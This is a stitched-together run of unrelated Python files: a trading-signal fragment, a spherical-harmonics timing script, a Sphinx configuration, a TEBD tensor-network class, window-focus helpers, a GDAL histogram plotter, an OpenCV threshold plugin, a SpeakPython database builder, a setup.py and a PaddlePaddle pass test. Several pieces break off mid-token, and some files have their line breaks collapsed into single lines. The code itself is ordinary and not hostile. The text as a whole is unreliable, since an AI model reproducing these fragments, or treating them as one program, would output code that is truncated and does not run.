        pred_v.append(fluc_m[-1].predict(PREDICT_X)[0])

    # Estimate the daily change: each positive->negative transition between
    # consecutive thresholds contributes that threshold to the estimate.
    change = 0
    for i in range(1, len(limit_comp)):
        l = (pred_v[i - 1] > pred_v[i])
        if l:
            change = change + (l * limit_comp[i])

    # If the estimate clears the minimum limit, emit the trade commands.
    if change > limit:
        return pd.concat([
            pd.DataFrame({"Price": all_data.loc[all_data.index == predictDate, "price"],
                          "Regime": 1,
                          "Signal": "Buy"}),
            pd.DataFrame({"Price": all_data.loc[all_data.index == predictDate, "price"],
                          "Regime": -1,
                          "Signal": "Sell"}),
        ])
    else:
        return None
#!/usr/bin/env python
"""
This script is a python version of TimingAccuracyDHC. We use numpy functions to
simplify the creation of random coefficients.
"""
# NOTE: Python 2 script (print statements).
import os
import sys
import time

import numpy as np

# Make the in-tree pyshtools importable when run from the examples directory.
sys.path.append(os.path.join(os.path.dirname(__file__), "../../.."))
import pyshtools as shtools


#==== MAIN FUNCTION ====
def main():
    TimingAccuracyDHC()


#==== TEST FUNCTIONS ====
def TimingAccuracyDHC():
    """Time and check accuracy of complex Driscoll-Healy transforms for
    lmax = 2, 4, 8, ... up to maxdeg, printing one table row per lmax."""
    #---- input parameters ----
    maxdeg = 2800
    ls = np.arange(maxdeg + 1)
    sampling = 1
    beta = -1.5  # power-law exponent of the synthetic spectrum

    #---- create mask to filter out m<=l ----
    # NOTE(review): np.bool / np.complex below are deprecated numpy aliases
    # (removed in numpy 1.24); fine for the numpy versions this targeted.
    mask = np.zeros(2 * (maxdeg + 1) * (maxdeg + 1),
                    dtype=np.bool).reshape(2, maxdeg + 1, maxdeg + 1)
    mask[0, 0, 0] = True
    for l in ls:
        mask[:, l, :l + 1] = True
    # The m=0 imaginary part is not an independent coefficient.
    mask[1, :, 0] = False

    #---- create Gaussian powerlaw coefficients ----
    print 'creating {:d} random coefficients'.format(2 * (maxdeg + 1) *
                                                     (maxdeg + 1))
    cilm = np.zeros((2, (maxdeg + 1), (maxdeg + 1)), dtype=np.complex)
    random_numbers = np.random.normal(loc=0., scale=1.,
                                      size=2 * (maxdeg + 1) * (maxdeg + 1))
    cilm.imag = random_numbers.reshape(2, maxdeg + 1, maxdeg + 1)
    random_numbers = np.random.normal(loc=0., scale=1.,
                                      size=2 * (maxdeg + 1) * (maxdeg + 1))
    cilm.real = random_numbers.reshape(2, maxdeg + 1, maxdeg + 1)
    # Scale degrees l>=1 so the power spectrum follows l**beta.
    cilm[:, 1:, :] *= np.sqrt((ls[1:]**beta) / (2. * ls[1:] + 1.))[None, :, None]

    #---- time spherical harmonics transform for lmax set to increasing powers of 2 ----
    lmax = 2
    print 'lmax maxerror rms tinverse tforward'
    while lmax <= maxdeg:
        # trim coefficients to lmax
        cilm_trim = cilm[:, :lmax + 1, :lmax + 1]
        mask_trim = mask[:, :lmax + 1, :lmax + 1]

        #synthesis / inverse
        tstart = time.time()
        grid = shtools.MakeGridDHC(cilm_trim, sampling=sampling)
        tend = time.time()
        tinverse = tend - tstart

        #analysis / forward
        tstart = time.time()
        cilm2_trim = shtools.SHExpandDHC(grid, sampling=sampling)
        tend = time.time()
        tforward = tend - tstart

        # compute relative error of the round trip on the valid coefficients
        err = np.abs(cilm_trim[mask_trim] - cilm2_trim[mask_trim]) / \
            np.abs(cilm_trim[mask_trim])
        maxerr = err.max()
        # NOTE(review): despite the 'rms' label this is the *mean squared*
        # relative error -- no square root is taken.
        rmserr = np.mean(err**2)

        print '{:4d} {:1.2e} {:1.2e} {:1.1e}s {:1.1e}s'.\
            format(lmax, maxerr, rmserr, tinverse, tforward)
        lmax = lmax * 2


#==== EXECUTE SCRIPT ====
if __name__ == "__main__":
    main()
ed. # See the License for the specific language governing permissions and # limitations under the License. # # google-cloud-functions documentation build configuration file # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys import os import shlex # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. sys.path.insert(0, os.path.abspath("..")) # For plugins that can not read conf.py. # See also: https://github.com/docascode/sphinx-docfx-yaml/issues/85 sys.path.insert(0, os.path.abspath(".")) __version__ = "" # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. needs_sphinx = "1.5.5" # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ "sphinx.ext.autodoc", "sphinx.ext.autosummary", "sphinx.ext.intersphinx", "sphinx.ext.coverage", "sphinx.ext.doctest", "sphinx.ext.napoleon", "sphinx.ext.todo", "sphinx.ext.viewcode", "recommonmark", ] # autodoc/autosummary flags autoclass_content = "both" autodoc_default_options = {"members": True} autosummary_generate = True # Add any paths that contain templates here, relative to this directory. templates_path = ["_templates"] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # source_suffix = ['.rst', '.md'] source_suffix = [".rst", ".md"] # The encoding of source files. # source_encoding = 'utf-8-sig' # The root toctree document. 
root_doc = "index" # General information about the project. project = "google-cloud-functions" copyright = "2019, Google" author = "Google APIs" # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The full version, including alpha/beta/rc tags. release = __version__ # The short X.Y version. version = ".".join(release.split(".")[0:2]) # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: # today = '' # Else, today_fmt is used as the format for a strftime call. # today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = [ "_build", "**/.nox/**/*", "samples/AUTHORING_GUIDE.md", "samples/CONTRIBUTING.md", "samples/snippets/README.rst", ] # The reST default role (used for this markup: `text`) to use for all # documents. # default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. # add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). # add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. # show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = "sphinx" # A list of ignored prefixes for module index sorting. # modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built documents. 
# keep_warnings = False # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = True # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = "alabaster" # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. html_theme_options = { "description": "Google Cloud Client Libraries for google-cloud-functions", "github_user": "googleapis", "github_repo": "python-functions", "github_banner": True, "font_family": "'Roboto', Georgia, sans", "head_font_family": "'Roboto', Georgia, serif", "code_font_family": "'Roboto Mono', 'Consolas', monospace", } # Add any paths that contain custom themes here, relative to this directory. # html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". # html_title = None # A shorter title for the navigation bar. Default is the same as html_title. # html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. # html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. # html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the b
uiltin "default.css". html_static_path = ["_static"] #
Add any extra paths that contain custom files (such as robots.txt or # .htaccess) here, relative to this directory. These files are copied # directly to the root of the documentation. # html_extra_path = [] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. # html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. # html_use_smartypants = True # Custom sidebar templates, maps document names to template names. # html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. # html_additional_pages = {} # If false, no module index is generated. # html_domain_indices = True # If false, no index is generated. # html_use_index = True # If true, the index is split into individual pages for each letter. # html_split_index = False # If true, links to the reST sources are added to the pages. # html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. # html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. # html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. # html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). # html_file_suffix = None # Language to be used for generating the HTML full-text search index. # Sphinx supports the following languages: # 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja' # 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr' # html_search_language = 'en' # A dictionary with options for the search language support, empty by default. 
# Now only 'ja' uses this config value # html_search_options = {'type': 'default'} # The name of a javascript file (relative to the configuration directory) that # implements a search results scorer. If empty, the default will be used. # html_search_scorer = 'scorer.js' # Output file base name for HTML help builder. htmlhelp_basename = "google-cloud-functions-doc" # -- Options for warnings ------------------------------------------------------ suppress_warnings = [ # Temporarily suppress this to avoid "more than one
lf.H2s[None]) if term is None: raise ValueError(f"No term has been set for sites {sites}, either " "specifically or via a default term.") # add single site term to left site if present H1 = self.H1s.get(i, self.H1s[None]) # but only if this site has a term set if H1 is not None: I_2 = qu.eye(H1.shape[0], dtype=H1.dtype) term = term + qu.kron(H1, I_2) # if not PBC, for the last interaction, add to right site as well if sites and (j == self.n - 1) and (not self.cyclic): H1 = self.H1s.get(j, self.H1s[None]) # but again, only if that site has a term set if H1 is not None: I_2 = qu.eye(H1.shape[0], dtype=H1.dtype) term = term + qu.kron(I_2, H1) return term def __call__(self, sites=None): """Get the cached term for sites ``sites``, generate if necessary. """ try: return self._terms[sites] except KeyError: term = self.gen_term(sites) self._terms[sites] = term return term def mean_norm(self, ntype='fro'): """Computes the average frobenius norm of local terms. Also generates all terms if not already cached. """ if self.n is None: return qu.norm(self(), ntype) nterms = self.n - int(not self.cyclic) return sum( qu.norm(self((i, i + 1)), ntype) for i in range(nterms) ) / nterms def __repr__(self): return f"<NNI(n={self.n}, cyclic={self.cyclic})>" class TEBD: """Class implementing Time Evolving Block Decimation (TEBD) [1]. [1] Guifré Vidal, Efficient Classical Simulation of Slightly Entangled Quantum Computations, PRL 91, 147902 (2003) Parameters ---------- p0 : MatrixProductState Initial state. H : NNI or array_like Dense hamiltonian representing the two body interaction. Should have shape ``(d * d, d * d)``, where ``d`` is the physical dimension of ``p0``. dt : float, optional Default time step, cannot be set as well as ``tol``. tol : float, optional Default target error for each evolution, cannot be set as well as ``dt``, which will instead be calculated from the trotter orderm length of time, and hamiltonian norm. t0 : float, optional Initial time. Defaults to 0.0. 
split_opts : dict, optional Compression options applied for splitting after gate application, see :func:`~quimb.tensor.tensor_core.tensor_split`. See Also -------- quimb.Evolution """ def __init__(self, p0, H, dt=None, tol=None, t0=0.0, split_opts=None, progbar=True): # prepare initial state self._pt = p0.copy() self._pt.canonize(0) self.N = self._pt.nsites # handle hamiltonian -> convert array to NNI if isinstance(H, np.ndarray): H = NNI(H, cyclic=p0.cyclic) if not isinstance(H, NNI): raise TypeError("``H`` should be a ``NNI`` or 2-site array, " "not a TensorNetwork of any form.") if p0.cyclic != H.cyclic: raise ValueError("Both ``p0`` and ``H`` should have matching OBC " "or PBC.") self.H = H self.cyclic = H.cyclic self._ham_norm = H.mean_norm() self._U_ints = {} self._err = 0.0 # set time and tolerance defaults self.t0 = self.t = t0 if dt and tol: raise ValueError("Can't set default for both ``dt`` and ``tol``.") self.dt = self._dt = dt self.tol = tol # misc other options self.progbar = progbar self.split_opts = {} if split_opts is None else dict(split_opts) @property def pt(self): """The MPS state of the system at the current time. """ return self._pt.copy() @property def err(self): return self._err def choose_time_step(self, tol, T, order): """Trotter error is ``~ (T / dt) * dt^(order + 1)``. Invert to find desired time step, and scale by norm of interaction term. """ return (tol / (T * self._ham_norm)) ** (1 / order) def get_gate(self, dt_frac, sites=None): """Get the unitary (exponentiated) gate for fraction of timestep ``dt_frac`` and sites ``sites``, cached. """ if sites not in self.H.special_sites: sites = None try: return self._U_ints[dt_frac, sites] except KeyError: U = qu.expm(-1.0j * self._dt * dt_frac * self.H(sites)) self._U_ints[dt_frac, sites] = U return U def sweep(self, direction, dt_frac, dt=None, queue=False): """Perform a single sweep of gates and compression. 
This shifts the orthonognality centre along with the gates as they are applied and split. Parameters ---------- direction : {'right', 'left'} Which direction to sweep. Right is even bonds, left is odd. dt_frac : float What fraction of dt substep to take. dt : float, optional Overide the current ``dt`` with a custom value. """ # if custom dt set, scale the dt fraction if dt is not None: dt_frac *= (dt / self._dt) # ------ automatically combine consecutive sweeps of same time ------ # if not hasattr(self, '_queued_sweep'): self._queued_sweep = None if queue: # check for queued sweep if self._queued_sweep: # if matches, combine and continue if direction == self._queued_sweep[0]: self._queued_sweep[1] += dt_frac return # else perform the old, queue the new else: new_queued_sweep = [direction, dt_frac] direction, dt_frac = self._queued_sweep self._queued_sweep = new_queued_sweep # just queue the new sweep else: self._queued_sweep = [direction, dt_frac] return # check if need to drain the queue first elif self._queued_sweep: queued_direction, queued_dt_frac = self._queued_sweep self._queued_sweep = None self.sweep(queued_direction, queued_dt_frac, queue=False) # ------------------------------------------------------------------- # if direction == 'right': # Apply even gates: # # o-<-<-<-<-<-<-<-<-<- -<-< # | | | | | | | | | | | | >~>~>~>~>~>~>~>~>~>~>~o # UUU UUU UUU UUU UUU ... UUU --> | | | | | | | | | | | | # | | | | | | | | | | | | # 1 2 3 4 5 ==> # for i in range(0, self.N - 1, 2): sites = (i, i +
1) U = self.get_gate(dt_frac, sites) self._pt.left_canonize(start=max(0, i - 1), stop=i) self._pt.gate
_split_( U, where=sites, absorb='right', **self.split_opts) elif direction == 'left': # Apply odd gates: # # >->->- ->->->->->->->->-o # | | | | | | | | | | | | o~<~<~<~<~<~<~<~<~<~<~< # | UUU ... UUU UUU UUU UUU | --> | | | | | | | | | | | | # | | | | | | | | | | | | # <== 4 3 2 1 # for i in reversed(range(1, self.N - (0 if self.cyclic else 1), 2)): sites = (i, i + 1) U = self.get_gate(dt_frac, sites) self._pt.right_canonize( start=min(self.N - 1, i + 2), stop=i + 1) self._pt.gate_split_( U, where=sites, absorb='left', **self.split_opts) # one extra canonicalization
import sys

# Platform-dependent helpers for querying and restoring the foreground
# window/application.  Exactly one implementation pair is bound at import
# time, keyed on sys.platform.

if sys.platform.startswith('win32'):
    import win32gui

    # win32gui provides both calls natively.
    GetForegroundWindow = win32gui.GetForegroundWindow
    SetForegroundWindow = win32gui.SetForegroundWindow

elif sys.platform.startswith('darwin'):
    from Foundation import NSAppleScript

    def GetForegroundWindow():
        """Return the unix id of the frontmost process (via AppleScript)."""
        return NSAppleScript.alloc().initWithSource_("""
            tell application "System Events"
                return unix id of first process whose frontmost = true
            end tell""").executeAndReturnError_(None)[0].int32Value()

    def SetForegroundWindow(pid):
        """Make the process with unix id ``pid`` frontmost."""
        NSAppleScript.alloc().initWithSource_("""
            tell application "System Events"
                set the frontmost of first process whose unix id is %d to true
            end tell""" % pid).executeAndReturnError_(None)

elif sys.platform.startswith('linux'):
    from subprocess import call, check_output, CalledProcessError

    def GetForegroundWindow():
        """Return the X11 id of the active window, or None on failure."""
        try:
            output = check_output(['xprop', '-root', '_NET_ACTIVE_WINDOW'])
            return int(output.split()[-1], 16)
        except (CalledProcessError, OSError):
            # FIX: also catch OSError -- raised when xprop itself is not
            # installed (check_output only raises CalledProcessError for a
            # non-zero exit status).
            return None

    def SetForegroundWindow(w):
        """Returns focus to previous application."""
        try:
            call(['wmctrl', '-i', '-a', str(w)])
        except OSError:
            # FIX: subprocess.call() never raises CalledProcessError (only
            # check_call does), so the original handler was dead code and a
            # missing wmctrl binary escaped as an uncaught OSError.
            pass
#!/usr/bin/env python #/****************************************************************************** # * $Id$ # * # * Project: GDAL Make Histogram and Cumulative graph from Tab delimited tab as # generated by gdal_hist.py # * Purpose: Take a gdal_hist.py output and create a histogram plot using matplotlib # * Author: Trent Hare, thare@usgs.gov # * # ****************************************************************************** # * Public domain licenes (unlicense) # * # * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # * DEALINGS IN THE SOFTWARE. # ****************************************************************************/ import sys import os import math import numpy as np import pandas as pd from pandas.tools.plotting import table import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt def usage(): print 'Usage: slope_histogram_cumulative_graph.py -name "InSight E1" slope_histogram_table.tab outfile.png' prin
t " This program is geared to run on a table as generated by gdal_hist.py" print 'slope_histogram_cumulativ
e_graph.py -name "E_Marg_CE 01" DEM_1m_E_Marg_CE_adir_1m_hist.xls DEM_1m_E_Marg_CE_adir_1m_hist.png' sys.exit(0) #set None for commandline options name = "" infile = None outfile = None # ============================================================================= # Parse command line arguments. # ============================================================================= i = 1 while i < len(sys.argv): arg = sys.argv[i] if arg == '-name': i = i + 1 name = sys.argv[i] elif infile is None: infile = arg elif outfile is None: outfile = arg else: Usage() i = i + 1 if infile is None: usage() if not(os.path.isfile(infile)): input = sys.argv[1] print "filename %s does not exist." % (infile) sys.exit(1) #load table df = pd.DataFrame.from_csv(infile, sep='\t', header=1) #initialize figure fig, ax1 = plt.subplots() #calculate unscaled values #df.value = (df.value * 5) - 0.2 #df.ix[df.value < 0] = 0; df #not to reverse histogram before calculating 'approx' stats #min = round(df.value.min(),2) #max = round(df.value.max(),2) #mean = round(df.value.mean(),2) #stddev = round(df.value.std(),2) #rms = round(math.sqrt((mean * mean) + (stddev * stddev)),2) #statsDict = {'Min':min,'Max':max,'Mean':mean \ #,'StdDev':stddev,'RMS':rms} #statsSeries = pd.Series(statsDict,name='stats') #statsSeries.sort() #t = table(ax1, statsSeries, \ #loc='lower right', colWidths=[0.1] * 2) #t.set_fontsize(18) #props = t.properties() #cells = props['child_artists'] #for c in cells: #c.set_height(0.05) #Plot frequency histogram from input table ax1.fill(df.value,df['count'],'gray') #df.plot(ax1=ax1, kind='area', color='gray', legend=True) ax1.ticklabel_format(style='sci', axis='y', scilimits=(0,0)) ax1.get_yaxis().set_tick_params(direction='out') #get min and max as found by pandas for plotting 'arrow' at X=15 #minY = round(df['count'].min(),0) #maxY = round(df['count'].max(),0) #grab existing ax1 axes #ax = plt.axes() #ax.arrow(15, minY, 0, maxY, head_width=0, head_length=0, fc='k', ec='k') 
ax1.axvline(x=15, color='black', alpha=0.5) #add cumulative plot on 'Y2' axis using save X axes ax2 = ax1.twinx() ax2.plot(df.value,df['cumulative'],'blue') #df.plot(ax2=ax2, df.value,df['cumulative'],'blue') ax2.get_yaxis().set_tick_params(direction='out') #define labels ax1.set_xlabel('Slope (degrees)') ax1.set_ylabel('Count') ax2.set_ylabel('Cumulative') plt.suptitle(name + ' Slope Histogram and Cumulative Plot') #save out PNG plt.savefig(outfile) print "Graph exported to %s" % (outfile)
# -*- coding: utf-8 -*-
'''
Pupil Player Third Party Plugins by cpicanco
Copyright (C) 2016 Rafael Picanço.

The present file is distributed under the terms of the GNU General Public License (GPL v3.0).

You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import cv2
from pyglui import ui

from plugin import Plugin

# Channel indexes into frame.img (BGR order).
blue, green, red = 0, 1, 2


class Filter_Opencv_Threshold(Plugin):
    """
    Apply cv2.threshold in each channel of the (world) frame.img
    """
    uniqueness = "not_unique"

    # Map of user-facing mode names to OpenCV threshold flags.  "NONE" has
    # no entry on purpose: it (and any unknown string) disables the filter.
    THRESH_MODES = {
        "BINARY": cv2.THRESH_BINARY,
        "BINARY_INV": cv2.THRESH_BINARY_INV,
        "TRUNC": cv2.THRESH_TRUNC,
        "TOZERO": cv2.THRESH_TOZERO,
    }

    def __init__(self, g_pool, threshold=177, thresh_mode="BINARY", otsu=False):
        super(Filter_Opencv_Threshold, self).__init__(g_pool)
        # run after all plugins (use .1 to run before all plugins)
        self.order = .99

        # initialize empty menu
        self.menu = None

        # filter properties
        self.threshold = threshold
        self.thresh_mode = thresh_mode
        self.otsu = otsu

    def update(self, frame, events):
        """Threshold each BGR channel of ``frame.img`` in place."""
        # FIX: the original if-chain left cv2_thresh_mode unbound (NameError)
        # for any unrecognised mode string; a table lookup with a graceful
        # no-op covers "NONE" and bad values alike.
        cv2_thresh_mode = self.THRESH_MODES.get(self.thresh_mode)
        if cv2_thresh_mode is None:
            return

        if self.otsu:
            # Otsu's method picks the threshold automatically; the flag is
            # OR-able with the base mode.
            cv2_thresh_mode = cv2_thresh_mode + cv2.THRESH_OTSU

        # apply the threshold to each channel
        for i, channel in enumerate((frame.img[:, :, blue],
                                     frame.img[:, :, green],
                                     frame.img[:, :, red])):
            retval, edg = cv2.threshold(channel, self.threshold, 255,
                                        cv2_thresh_mode)
            frame.img[:, :, i] = edg

    def init_gui(self):
        """Build the plugin menu and register it with the main GUI."""
        # initialize the menu
        self.menu = ui.Scrolling_Menu('Threshold')
        # add menu to the window
        self.g_pool.gui.append(self.menu)

        # append elements to the menu
        self.menu.append(ui.Button('remove', self.unset_alive))
        self.menu.append(ui.Info_Text('Filter Properties'))
        self.menu.append(ui.Selector('thresh_mode', self, label='Thresh Mode',
                                     selection=["NONE", "BINARY", "BINARY_INV",
                                                "TRUNC", "TOZERO"]))
        self.menu.append(ui.Switch('otsu', self, label='Otsu'))
        self.menu.append(ui.Slider('threshold', self,
                                   min=0, step=1, max=255, label='Threshold'))

    def deinit_gui(self):
        """Remove the menu from the GUI if it was created."""
        if self.menu:
            self.g_pool.gui.remove(self.menu)
            self.menu = None

    def unset_alive(self):
        """Request removal of this plugin on the next plugin sweep."""
        self.alive = False

    def get_init_dict(self):
        # persistent properties throughout sessions
        return {'threshold': self.threshold,
                'thresh_mode': self.thresh_mode,
                'otsu': self.otsu}

    def cleanup(self):
        """
        called when the plugin gets terminated.
        This happens either voluntarily or forced.
        if you have a GUI or glfw window destroy it here.
        """
        self.deinit_gui()
import antlr3; import sqlite3; import pickle; import sys, os; import re; from SpeakPython.SpeakPython import SpeakPython; from SpeakPython.SpeakPythonLexer import SpeakPythonLexer; from SpeakPython.SpeakPythonParser import SpeakPythonParser; #sort results based on length of labels def sortResults(results): l = len(results); if l == 1 or l == 0: return results; s1 = sortResults(results[:l/2]); s2 = sortResults(results[l/2:]); res = []; si1 = 0; si2 = 0; sl1 = len(s1); sl2 = len(s2); max = sl1 + sl2; for i in range(0, max): if si1 == sl1: res.extend(s2[si2:]); break; if si2 == sl2: res.extend(s1[si1:]); break; if len(s1[si1].labels) > len(s2[si2].labels): res.append( s1[si1] ); si1 += 1; else: res.append( s2[si2] ); si2 += 1; return res; def makeDB(conn): c = conn.cursor(); try: c.execute("DROP TABLE matches"); c.execute("DROP TABLE functions"); c.execute("DROP TABLE kleene") conn.commit(); except Exception as e: conn.rollback(); c.execute("CREATE TABLE matches (order_id INTEGER PRIMARY KEY, keywords TEXT, regex TEXT, results BLOB)"); c.execute("CREATE TABLE functions (name TEXT, regex TEXT, results BLOB)"); c.execute("CREATE TABLE kleene (id TEXT PRIMARY KEY, regexes BLOB)"); #index the keywords to speed up text search c.execute("CREATE INDEX IF NOT EXISTS keyword_idx ON matches (keywords)"); c.execute("CREATE INDEX IF NOT EXISTS func_name_idx ON functions (name)"); conn.commit(); def performTestCases(exp, testCases): print "Testing: ", exp for t in testCases: m = re.match(exp, t); if m == None: print "Test case failed: ", t; return False; return True; def insertIntoDB(conn, matches, functions): matchEntries = []; kleeneEntries = []; funcEntries = []; print "Running test cases for matches..."; idCount = 0; for m in matches: #perform in-suite test cases succeededTests = performTestCases(m.exp, m.testCases); if not succeededTests: return; k = ','.join(m.keywords); m.results = sortResults(m.results); if len(m.kGroupRegexes) > 0: kleeneEntries.append((str(idCount), 
pickle.dumps(m.kGroupRegexes))); matchEntries.append((idCount, k, m.exp, pickle.dumps(m.results))); idCount += 1; print "All mat
ch test cases passed."; c = conn.cursor(); c.executemany("INSERT INTO matches VALUES (?,?,?,?)", matchEntries)
; conn.commit(); print "Running test cases for functions..."; for f in functions: f = functions[f]; #perform in-suite test cases succeededTests = performTestCases(f, f.testCases); if not succeededTests: return; #save all regex groups in database under function name if len(f.kGroupRegexes) > 0: kleeneEntries.append((f.getName(), pickle.dumps(f.kGroupRegexes))); f.results = sortResults(f.results); funcEntries.append((f.getName(), f.getExp(), pickle.dumps(f.getResults()))); print "All function test cases passed"; c.executemany("INSERT INTO functions VALUES (?,?,?)", funcEntries); c.executemany("INSERT INTO kleene VALUES (?,?)", kleeneEntries); conn.commit(); print "Functions:"; for row in c.execute("SELECT * FROM functions"): print row, '\n'; print "\n"; print "Matches:"; for row in c.execute("SELECT * FROM matches"): print row, '\n'; print "\n"; print "Kleene:"; for row in c.execute("SELECT * FROM kleene"): print row, '\n'; print "\n"; conn.close(); def parse(conn, fileList, dirName): parser = None; otherGlobalTests = {}; for f in fileList: #join filename with current directory path fileName = os.path.join(dirName, f); #if f is a file, parse and insert into db if os.path.isfile(fileName): char_stream = antlr3.ANTLRFileStream(fileName); lexer = SpeakPythonLexer(char_stream); tokens = antlr3.CommonTokenStream(lexer); # for t in lexer: # print t; parser = SpeakPythonParser(tokens); parser.prog(); insertIntoDB(conn, parser.matches, parser.aliases); #if f is a dir, pass list of files into recursive call if os.path.isdir(fileName): subFiles = os.listdir(fileName); otherGlobalTests = parse(conn, subFiles, fileName); globalTests = {}; if parser == None: print "Parser not defined." 
else: globalTests = parser.globalTests; globalTests.update(otherGlobalTests); return globalTests; def main(argv): name = argv[1] + '.db'; conn = sqlite3.connect(name); makeDB(conn); globalTests = parse(conn, [argv[2]], ''); for gt in globalTests: sp = SpeakPython(name); r = sp.matchResult(gt); resultStr = ''; if r != None: resultStr = r.getResult(); if resultStr != globalTests[gt]: print "Value test case failed: (" + gt + ") does not return (" + globalTests[gt] + "), but instead returns (" + resultStr + ")"; main(sys.argv);
from distutils.core import setup

# Package release number (single source of truth for this file).
VERSION = '1.1.1'

# Packaging metadata for the CacheGenerator Django helper.
setup(
    name='CacheGenerator',
    version=VERSION,
    description="CacheGenerator for Django",
    author="Ricardo Santos",
    author_email="ricardo@getgears.com",
    url="http://github.com/ricardovice/CacheGenerator/",
    packages=['cachegenerator'],
)
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import os
import paddle
import paddle.distributed.fleet as fleet
import numpy as np
import paddle.nn as nn
from paddle.distributed.passes import new_pass, PassManager
import unittest
from dist_pass_test_base import DistPassTestBase


class BatchNormAddActNet(nn.Layer):
    # Small NHWC network producing the exact pattern the fuse_bn_add_act
    # pass targets: bn2(conv2(x)) + bn1(conv1(x)) followed by ReLU.

    def __init__(self):
        super(BatchNormAddActNet, self).__init__()
        self.conv1 = nn.Conv2D(3, 8, (3, 3), data_format="NHWC")
        self.conv2 = nn.Conv2D(3, 8, (3, 3), data_format="NHWC")
        self.bn1 = nn.BatchNorm2D(8, data_format="NHWC")
        self.bn2 = nn.BatchNorm2D(8, data_format="NHWC")
        self.relu = nn.ReLU()

    def forward(self, x):
        # Branch 1: conv1 -> bn1.
        y = self.conv1(x)
        y = self.bn1(y)
        # Branch 2: conv2 -> bn2, added to branch 1, then the activation
        # (the add + relu following a batch norm is what gets fused).
        out = self.conv2(x)
        out = self.bn2(out) + y
        out = self.relu(out)
        out = paddle.flatten(out, 1)
        return out


class TestFuseBatchNormAddActPass(DistPassTestBase):
    # Builds the model under fleet + AMP, applies the "fuse_bn_add_act"
    # pass, and asserts the fused forward/backward ops appear in the
    # program.  Output equivalence with/without the pass is checked by
    # DistPassTestBase.check_main().

    def init(self):
        # Tolerances used by the base class when comparing outputs
        # with and without the pass applied.
        self.atol = 1e-4
        self.rtol = 1e-4

    def get_model(self, place, batch_size=32, image_shape=[224, 224, 3]):
        # Build the static-graph training program and return the tuple
        # expected by DistPassTestBase:
        #   (main_program, startup_program, feed_vars, fetch_vars, reader).
        image = paddle.static.data(
            shape=[batch_size] + image_shape, dtype='float32', name='image')
        model = BatchNormAddActNet()
        pred_out = model(image)
        loss = paddle.mean(pred_out)
        optimizer = paddle.optimizer.Adam(learning_rate=1e-3)

        dist_strategy = fleet.DistributedStrategy()
        dist_strategy.fuse_all_reduce_ops = False
        dist_strategy.without_graph_optimization = True
        # AMP enabled with dynamic loss scaling.
        # NOTE(review): presumably the fused kernel requires mixed
        # precision -- confirm against the pass implementation.
        dist_strategy.amp = True
        dist_strategy.amp_configs = {
            "init_loss_scaling": 32768,
            "use_dynamic_loss_scaling": True,
        }
        fleet.init(is_collective=True, strategy=dist_strategy)
        optimizer = fleet.distributed_optimizer(optimizer)
        optimizer.minimize(loss)

        rank = paddle.distributed.get_rank()

        def reader():
            # Deterministic per-rank random batches, seeded from $SEED so
